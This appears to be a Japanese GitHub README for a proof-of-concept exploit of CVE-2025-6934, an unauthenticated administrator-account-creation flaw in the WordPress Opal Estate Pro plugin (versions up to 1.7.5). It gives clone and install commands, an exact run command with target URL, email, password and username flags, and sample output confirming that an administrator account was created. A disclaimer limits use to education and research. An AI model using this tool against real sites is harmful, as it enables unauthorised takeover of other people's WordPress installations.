
CVE-2025-6934 は、WordPress の Opal Estate Pro プラグイン (<= 1.7.5) における重大な脆弱性であり、認証されていない攻撃者が、プラグインの安全でない AJAX 登録プロセスを介して新しい管理者アカウントを作成できるようにするものです。
📖 説明 このリポジトリには、CVE-2025-6934 用の概念実証(PoC)エクスプロイトが含まれています。 これは、WordPress プラグイン: Opal Estate Pro <= 1.7.5 における重大な脆弱性であり、認証されていない管理者アカウントの作成を可能にします。
⚠️ 免責事項: このツールは教育およびセキュリティ研究目的のみで提供されます。
著者は、このツールの誤用や発生した損害について一切の責任を負いません。
readme.txt からのプラグインバージョンの自動検出リポジトリをクローンし、依存関係をインストールします:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
ターゲットを指定してスクリプトを実行します:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ 出力例:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
このプロジェクトはMIT ライセンスの下でライセンスされています。詳細については LICENSE ファイルを参照してください。